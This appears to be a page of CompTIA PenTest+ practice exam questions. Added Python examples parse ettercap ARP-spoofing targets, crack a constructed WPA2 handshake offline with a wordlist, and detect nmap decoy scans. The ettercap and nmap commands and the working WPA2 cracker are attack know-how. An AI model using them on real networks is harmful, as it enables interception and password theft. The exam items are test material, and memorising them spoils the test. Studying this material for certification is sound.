Comptia (PT0-001) Exam Questions And Answers page 8
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
Executive summary
Technical summary
Main body
Penetration Testing Tools
Reporting and Communication
A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box. Which of the following techniques is suitable to attempt this?
Employ NBNS poisoning.
Perform ARP spoofing.
Conduct a phishing campaign.
Use an SSL downgrade attack.
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?
The penetration tester was not provided with a WSDL file.
The penetration tester needs an OAuth bearer token.
The tester has provided an incorrect password for the application.
An IPS/WAF whitelist is in place to protect the environment.
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
Dynamic analysis
Fuzzing analysis
Static analysis
Run-time analysis
Planning and Scoping
Penetration Testing Tools
A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the penetration tester's SSH connection to the testing platform drops:
Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?
# sudo ettercap -Tq -w output.cap -M ARP /192.168.1.0/ /192.168.1.255/
# proxychains ettercap -Tq -w output.cap -M ARP /192.168.1.13/ /192.168.1.1/
# ettercap -Tq -w output.cap -M ARP 00:00:00:00:00:00//80 FF:FF:FF:FF:FF:FF//80
# ettercap -safe-mode -Tq -w output.cap -M ARP /192.168.1.2-255/ /192.168.1.13/
# ettercap -Tq -w output.cap -M ARP /192.168.1.2-12;192.168.1.14-255/ /192.168.1.1/
Attacks and Exploits
Penetration Testing Tools
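The point of this question is which TARGET specification keeps the tester's own host (192.168.1.13, the end of the SSH tunnel) out of the poisoned set while still covering the gateway. The following is an added example, not code from the page or from ettercap: it expands ettercap's MAC/IPs/PORTs target syntax (ranges and comma lists in any octet, `;`-separated entries) and checks each candidate command. The commands are the five options with their option dashes restored; the MAC filter of a target is parsed but not evaluated, which is a simplification. Note that in a real shell the `;` inside a target must be quoted.

```python
"""Expand ettercap TARGET specs and check which ARP-spoof command keeps the
tester's own host (the SSH tunnel endpoint) out of the poisoned set.
Added example; the five commands are the exam options with dashes restored."""

TESTER_IP = "192.168.1.13"   # from the question
GATEWAY_IP = "192.168.1.1"   # from the question


def expand_octet(spec):
    """'2-12,14' -> {2..12, 14}; ettercap accepts ranges and comma lists in any octet."""
    values = set()
    for part in spec.split(","):
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            values.update(range(lo, hi + 1))
        else:
            values.add(int(part))
    if not values or min(values) < 0 or max(values) > 255:
        raise ValueError(f"bad octet spec: {spec!r}")
    return values


def expand_ips(ip_field):
    """Expand the IPs field ('entry;entry;...') into a set of dotted addresses.
    An empty field means ANY and is returned as None."""
    if ip_field == "":
        return None
    hosts = set()
    for entry in ip_field.split(";"):
        octets = entry.split(".")
        if len(octets) != 4:
            raise ValueError(f"bad IP entry: {entry!r}")
        o1, o2, o3, o4 = (expand_octet(o) for o in octets)
        hosts.update(f"{a}.{b}.{c}.{d}" for a in o1 for b in o2 for c in o3 for d in o4)
    return hosts


def parse_target(target):
    """ettercap TARGET is MAC/IPs/PORTs; '/192.168.1.2-12/' means any MAC, listed IPs, any port."""
    parts = target.split("/")
    if len(parts) != 3:
        raise ValueError(f"expected MAC/IPs/PORTs, got {target!r}")
    mac, ips, ports = parts
    return {"mac": mac or None, "ips": expand_ips(ips), "ports": ports or None}


def analyze(cmdline):
    """Take the two TARGET arguments after '-M ARP' and report whether the command
    would poison the tester's own host and whether it covers the gateway."""
    tokens = cmdline.split()
    i = tokens.index("ARP")
    t1, t2 = parse_target(tokens[i + 1]), parse_target(tokens[i + 2])

    def covers(t, ip):
        # ANY matches every IP; the MAC filter is not modelled (simplification)
        return t["ips"] is None or ip in t["ips"]

    return {
        "tester_poisoned": covers(t1, TESTER_IP) or covers(t2, TESTER_IP),
        "gateway_targeted": covers(t1, GATEWAY_IP) or covers(t2, GATEWAY_IP),
        "host_count": tuple(len(t["ips"]) if t["ips"] is not None else None for t in (t1, t2)),
    }


OPTIONS = {
    "A": "sudo ettercap -Tq -w output.cap -M ARP /192.168.1.0/ /192.168.1.255/",
    "B": "proxychains ettercap -Tq -w output.cap -M ARP /192.168.1.13/ /192.168.1.1/",
    "C": "ettercap -Tq -w output.cap -M ARP 00:00:00:00:00:00//80 FF:FF:FF:FF:FF:FF//80",
    "D": "ettercap -safe-mode -Tq -w output.cap -M ARP /192.168.1.2-255/ /192.168.1.13/",
    "E": "ettercap -Tq -w output.cap -M ARP /192.168.1.2-12;192.168.1.14-255/ /192.168.1.1/",
}

if __name__ == "__main__":
    for letter, cmd in OPTIONS.items():
        print(letter, analyze(cmd))
```

Only option E covers the rest of the subnet against the gateway while leaving 192.168.1.13 out of both target sets; B and D put the tester's own address into the spoofed pair, and A names only the network and broadcast addresses.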
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
MAC address of the client
MAC address of the domain controller
MAC address of the web server
MAC address of the gateway
Attacks and Exploits
Penetration Testing Tools
A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?
Deauthentication attacks against an access point can allow an opportunity to capture the four-way handshake, which can be used to obtain and crack the encrypted password.
Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to crack the password, which can then be used to connect to the WPA2-protected access point.
Weak implementations of the WEP can allow PIN numbers to be guessed quickly, which can then be used to retrieve the password, which can then be used to connect to the WEP-protected access point.
Rainbow tables contain all possible password combinations, which can be used to perform a brute-force password attack to retrieve the password, which can then be used to connect to the WPA2-protected access point.
Attacks and Exploits
Penetration Testing Tools
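Why a captured four-way handshake is enough: every input to the EAPOL MIC (SSID, both MAC addresses, both nonces, the frame itself) travels in the clear, so candidate passphrases can be tested offline with no further packets to the access point. The following is an added example, not code from the page or from any tool it names; it implements the WPA2-PSK derivation (PBKDF2 to the PMK, PRF-512 to the PTK, HMAC-SHA1 MIC for key descriptor version 2) and runs a dictionary attack. The handshake parameters and the message 2 frame are constructed here for the example; the deauthentication and capture steps are not shown.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.
Added example; the handshake below is constructed, not a real capture."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    The first 16 bytes are the KCK, the key that authenticates the EAPOL MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # EAPOL header (4) + key descriptor fields preceding Key MIC (77)


def eapol_mic(kck, frame):
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Recompute the MIC of message 2 for each candidate passphrase and compare with the captured one."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def build_msg2(snonce, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2 (STA -> AP) layout, constructed for this example."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1 MIC), Pairwise, MIC bit
    body = struct.pack(">BHH", 2, key_info, 0)                  # descriptor type RSN, key info, key length
    body += struct.pack(">Q", 1)                                 # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # SNonce, key IV, key RSC, key ID
    body += mic + struct.pack(">H", 0)                           # key MIC, key data length (no RSN IE)
    return struct.pack(">BBH", 2, 3, len(body)) + body           # EAPOL version 2, type Key (3), length


# Constructed handshake parameters for a hypothetical network (not from the exam page)
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
TRUE_PASSPHRASE = "Summer2019!"


def make_sample_capture():
    """Stand-in for a captured message 2: its MIC is computed with TRUE_PASSPHRASE."""
    kck = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


if __name__ == "__main__":
    print(crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, make_sample_capture(),
                          ["password", "letmein", "Summer2019!", "welcome1"]))
```

The cost of the attack is one PBKDF2 run of 4096 SHA-1 iterations per candidate, which is why the practical speed of a handshake crack is set by the wordlist and the hardware rather than by anything the access point does.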
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.
The tester runs the following command:
nmap -D 192.168.1.1,192.168.1.2,192.168.1.3 -sV -o --max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?
The network is subnetted as a /25 or greater, and the tester needed to access hosts on two different subnets.
The tester is trying to perform a more stealthy scan by including several bogus addresses.
The scanning machine has several interfaces to balance the scan request across at the specified rate.
A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.
Information Gathering and Vulnerability Identification
Penetration Testing Tools
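Seen from the target's side, the decoys in `-D` make the same probe arrive from several sources, which is both what hides the scanner and what gives the scan away. The following is an added example, not code from the page or from nmap: it clusters SYN probes per destination port over constructed log lines (a hypothetical `TS SRC= DST= DPT= FLAGS=` format) to find the decoy set, then uses the fact that decoys cover only raw probes, while version detection (`-sV`) needs a completed TCP session from the real host, to pick out the scanner. The real scanner address 192.168.1.77 and the time window are assumptions of the example.

```python
"""Spot an nmap decoy scan (-D) in connection logs and separate the scanner from its decoys.
Added example; the log lines are constructed in a hypothetical format."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S+)$")


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["dpt"] = int(rec["dpt"])
    return rec


def decoy_clusters(lines, window_ms=2000, min_sources=3):
    """For every (dst, port) collect SYN-only probes. nmap sends the same probe once per decoy
    and once from itself, so several distinct sources hitting one port within a short window
    is the decoy signature. window_ms is a tunable assumption."""
    by_port = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["flags"] == "SYN":
            by_port[(rec["dst"], rec["dpt"])].append(rec)
    clusters = {}
    for key, recs in by_port.items():
        recs.sort(key=lambda r: r["ts"])
        span_ms = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds() * 1000
        sources = {r["src"] for r in recs}
        if len(sources) >= min_sources and span_ms <= window_ms:
            clusters[key] = sources
    return clusters


def likely_real_scanner(lines, clusters):
    """Decoys only work for raw SYN probes; -sV must complete a real TCP session, which only the
    true source can do. A cluster member that later completes a handshake (ACK / PSH-ACK) is the scanner."""
    suspects = set().union(*clusters.values())
    talkers = {r["src"] for r in filter(None, map(parse_line, lines))
               if r["flags"] in ("ACK", "PSH-ACK")}
    return suspects & talkers


# Constructed log: decoys .1/.2/.3 from the question, hypothetical real scanner .77,
# probes spaced 0.5 s apart, then the -sV banner grab that only the real host can perform.
SAMPLE_LOG = [
    "2019-06-01T10:00:00.000 SRC=192.168.1.1 DST=192.168.1.130 DPT=22 FLAGS=SYN",
    "2019-06-01T10:00:00.500 SRC=192.168.1.2 DST=192.168.1.130 DPT=22 FLAGS=SYN",
    "2019-06-01T10:00:01.000 SRC=192.168.1.77 DST=192.168.1.130 DPT=22 FLAGS=SYN",
    "2019-06-01T10:00:01.500 SRC=192.168.1.3 DST=192.168.1.130 DPT=22 FLAGS=SYN",
    "2019-06-01T10:00:02.000 SRC=192.168.1.1 DST=192.168.1.130 DPT=80 FLAGS=SYN",
    "2019-06-01T10:00:02.500 SRC=192.168.1.2 DST=192.168.1.130 DPT=80 FLAGS=SYN",
    "2019-06-01T10:00:03.000 SRC=192.168.1.77 DST=192.168.1.130 DPT=80 FLAGS=SYN",
    "2019-06-01T10:00:03.500 SRC=192.168.1.3 DST=192.168.1.130 DPT=80 FLAGS=SYN",
    "2019-06-01T10:00:05.000 SRC=192.168.1.77 DST=192.168.1.130 DPT=22 FLAGS=PSH-ACK",
    "2019-06-01T10:00:05.200 SRC=192.168.1.50 DST=192.168.1.130 DPT=443 FLAGS=SYN",
]

if __name__ == "__main__":
    clusters = decoy_clusters(SAMPLE_LOG)
    for key, sources in clusters.items():
        print(key, sorted(sources))
    print("likely scanner:", likely_real_scanner(SAMPLE_LOG, clusters))
```

Two caveats for the tester: decoy addresses that are live hosts (here the gateway and two neighbours) will receive the target's SYN/ACKs and may themselves reset or log them, and the `-sV` phase undoes the concealment for any analyst who correlates the clusters with completed sessions.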
A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following threat actors will be emulated?
APT
Hacktivist
Script kiddie
Insider threat
Attacks and Exploits
Penetration Testing Tools
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
Nikto
WAR
W3AF
Swagger
Information Gathering and Vulnerability Identification
Penetration Testing Tools